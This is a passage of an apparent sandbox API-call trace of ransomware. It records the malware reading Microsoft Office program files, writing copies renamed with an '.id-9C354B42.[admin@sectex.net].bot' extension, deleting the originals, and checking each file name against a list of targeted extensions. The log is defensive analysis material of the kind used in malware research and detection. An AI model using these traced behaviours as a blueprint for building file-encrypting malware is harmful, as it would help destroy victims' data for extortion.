	[0141.178] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.178] SetEndOfFile (hFile=0x3bc) returned 1
	[0141.179] CloseHandle (hObject=0x3bc) returned 1
	[0141.179] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.179] SetEndOfFile (hFile=0x3b0) returned 1
	[0141.181] CloseHandle (hObject=0x3b0) returned 1
	[0141.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.243] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid")) returned 1
	[0141.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.260] lstrlenW (lpString=".doc") returned 4
	[0141.260] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.260] lstrlenW (lpString=".docx") returned 5
	[0141.260] lstrcmpiW (lpString1=".docx", lpString2="0.MID") returned -1
	[0141.260] lstrlenW (lpString=".pdf") returned 4
	[0141.260] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.260] lstrlenW (lpString=".xls") returned 4
	[0141.260] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.261] lstrlenW (lpString=".xlsx") returned 5
	[0141.261] lstrcmpiW (lpString1=".xlsx", lpString2="0.MID") returned -1
	[0141.261] lstrlenW (lpString=".ppt") returned 4
	[0141.261] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.261] lstrlenW (lpString=".zip") returned 4
	[0141.261] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.261] lstrlenW (lpString=".rar") returned 4
	[0141.261] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.261] lstrlenW (lpString=".bz2") returned 4
	[0141.261] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.261] lstrlenW (lpString=".7z") returned 3
	[0141.261] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.261] lstrlenW (lpString=".dbf") returned 4
	[0141.261] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.261] lstrlenW (lpString=".1cd") returned 4
	[0141.261] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.261] lstrlenW (lpString=".jpg") returned 4
	[0141.261] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.261] lstrlenW (lpString=".doc") returned 4
	[0141.261] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.261] lstrlenW (lpString=".docx") returned 5
	[0141.261] lstrcmpiW (lpString1=".docx", lpString2="0.MID") returned -1
	[0141.261] lstrlenW (lpString=".pdf") returned 4
	[0141.261] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.261] lstrlenW (lpString=".xls") returned 4
	[0141.261] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.261] lstrlenW (lpString=".xlsx") returned 5
	[0141.261] lstrcmpiW (lpString1=".xlsx", lpString2="0.MID") returned -1
	[0141.262] lstrlenW (lpString=".ppt") returned 4
	[0141.262] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.262] lstrlenW (lpString=".zip") returned 4
	[0141.262] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.262] lstrlenW (lpString=".rar") returned 4
	[0141.262] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.262] lstrlenW (lpString=".bz2") returned 4
	[0141.262] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.262] lstrlenW (lpString=".7z") returned 3
	[0141.262] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.262] lstrlenW (lpString=".dbf") returned 4
	[0141.262] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.262] lstrlenW (lpString=".1cd") returned 4
	[0141.262] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63
	[0141.262] lstrlenW (lpString=".jpg") returned 4
	[0141.262] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.262] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.262] lstrlenW (lpString="Apothecary.eftx") returned 15
	[0141.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.277] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=49025) returned 1
	[0141.277] CloseHandle (hObject=0x384) returned 1
	[0141.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx")) returned 0x20
	[0141.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.289] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.289] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.300] GetLastError () returned 0x0
	[0141.300] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbf81, lpOverlapped=0x0) returned 1
	[0141.331] WriteFile (in: hFile=0x3b4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbf90, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbf90, lpOverlapped=0x0) returned 1
	[0141.333] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.333] WriteFile (in: hFile=0x3b4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0141.333] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.333] CloseHandle (hObject=0x3b4) returned 1
	[0141.333] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.333] SetEndOfFile (hFile=0x384) returned 1
	[0141.336] CloseHandle (hObject=0x384) returned 1
	[0141.336] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.363] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx")) returned 1
	[0141.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.384] lstrlenW (lpString=".doc") returned 4
	[0141.384] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.384] lstrlenW (lpString=".docx") returned 5
	[0141.384] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.384] lstrlenW (lpString=".pdf") returned 4
	[0141.385] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.385] lstrlenW (lpString=".xls") returned 4
	[0141.385] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.385] lstrlenW (lpString=".xlsx") returned 5
	[0141.385] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.385] lstrlenW (lpString=".ppt") returned 4
	[0141.385] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.385] lstrlenW (lpString=".zip") returned 4
	[0141.385] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.385] lstrlenW (lpString=".rar") returned 4
	[0141.385] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.385] lstrlenW (lpString=".bz2") returned 4
	[0141.385] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.385] lstrlenW (lpString=".7z") returned 3
	[0141.385] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.385] lstrlenW (lpString=".dbf") returned 4
	[0141.385] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.385] lstrlenW (lpString=".1cd") returned 4
	[0141.385] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.385] lstrlenW (lpString=".jpg") returned 4
	[0141.385] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.385] lstrlenW (lpString=".doc") returned 4
	[0141.385] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.385] lstrlenW (lpString=".docx") returned 5
	[0141.385] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.385] lstrlenW (lpString=".pdf") returned 4
	[0141.385] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.385] lstrlenW (lpString=".xls") returned 4
	[0141.386] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.386] lstrlenW (lpString=".xlsx") returned 5
	[0141.386] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.386] lstrlenW (lpString=".ppt") returned 4
	[0141.386] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.386] lstrlenW (lpString=".zip") returned 4
	[0141.386] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.386] lstrlenW (lpString=".rar") returned 4
	[0141.386] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.386] lstrlenW (lpString=".bz2") returned 4
	[0141.386] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.386] lstrlenW (lpString=".7z") returned 3
	[0141.386] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.386] lstrlenW (lpString=".dbf") returned 4
	[0141.386] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.386] lstrlenW (lpString=".1cd") returned 4
	[0141.386] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82
	[0141.386] lstrlenW (lpString=".jpg") returned 4
	[0141.386] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.386] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.386] lstrlenW (lpString="Clarity.eftx") returned 12
	[0141.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.399] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=32818) returned 1
	[0141.399] CloseHandle (hObject=0x3b4) returned 1
	[0141.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx")) returned 0x20
	[0141.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.405] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.405] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.406] GetLastError () returned 0x0
	[0141.406] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x8032, lpOverlapped=0x0) returned 1
	[0141.408] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x8040, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x8040, lpOverlapped=0x0) returned 1
	[0141.410] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.410] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.410] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.410] CloseHandle (hObject=0x3ac) returned 1
	[0141.410] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.410] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.412] CloseHandle (hObject=0x3b4) returned 1
	[0141.413] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.413] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx")) returned 1
	[0141.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.413] lstrlenW (lpString=".doc") returned 4
	[0141.413] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.413] lstrlenW (lpString=".docx") returned 5
	[0141.413] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.413] lstrlenW (lpString=".pdf") returned 4
	[0141.413] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.414] lstrlenW (lpString=".xls") returned 4
	[0141.414] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.414] lstrlenW (lpString=".xlsx") returned 5
	[0141.414] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.414] lstrlenW (lpString=".ppt") returned 4
	[0141.414] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.414] lstrlenW (lpString=".zip") returned 4
	[0141.414] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.414] lstrlenW (lpString=".rar") returned 4
	[0141.414] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.414] lstrlenW (lpString=".bz2") returned 4
	[0141.414] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.414] lstrlenW (lpString=".7z") returned 3
	[0141.414] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.414] lstrlenW (lpString=".dbf") returned 4
	[0141.414] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.414] lstrlenW (lpString=".1cd") returned 4
	[0141.414] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.414] lstrlenW (lpString=".jpg") returned 4
	[0141.414] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.414] lstrlenW (lpString=".doc") returned 4
	[0141.414] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.414] lstrlenW (lpString=".docx") returned 5
	[0141.414] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.414] lstrlenW (lpString=".pdf") returned 4
	[0141.414] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.414] lstrlenW (lpString=".xls") returned 4
	[0141.414] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.415] lstrlenW (lpString=".xlsx") returned 5
	[0141.415] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.415] lstrlenW (lpString=".ppt") returned 4
	[0141.415] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.415] lstrlenW (lpString=".zip") returned 4
	[0141.415] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.415] lstrlenW (lpString=".rar") returned 4
	[0141.415] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.415] lstrlenW (lpString=".bz2") returned 4
	[0141.415] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.415] lstrlenW (lpString=".7z") returned 3
	[0141.415] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.415] lstrlenW (lpString=".dbf") returned 4
	[0141.415] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.415] lstrlenW (lpString=".1cd") returned 4
	[0141.415] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79
	[0141.415] lstrlenW (lpString=".jpg") returned 4
	[0141.415] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.415] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.415] lstrlenW (lpString="Concourse.eftx") returned 14
	[0141.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.416] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=22417) returned 1
	[0141.416] CloseHandle (hObject=0x3b4) returned 1
	[0141.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx")) returned 0x20
	[0141.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.417] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.417] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.417] GetLastError () returned 0x0
	[0141.417] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x5791, lpOverlapped=0x0) returned 1
	[0141.421] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x57a0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x57a0, lpOverlapped=0x0) returned 1
	[0141.422] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.422] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf0, lpOverlapped=0x0) returned 1
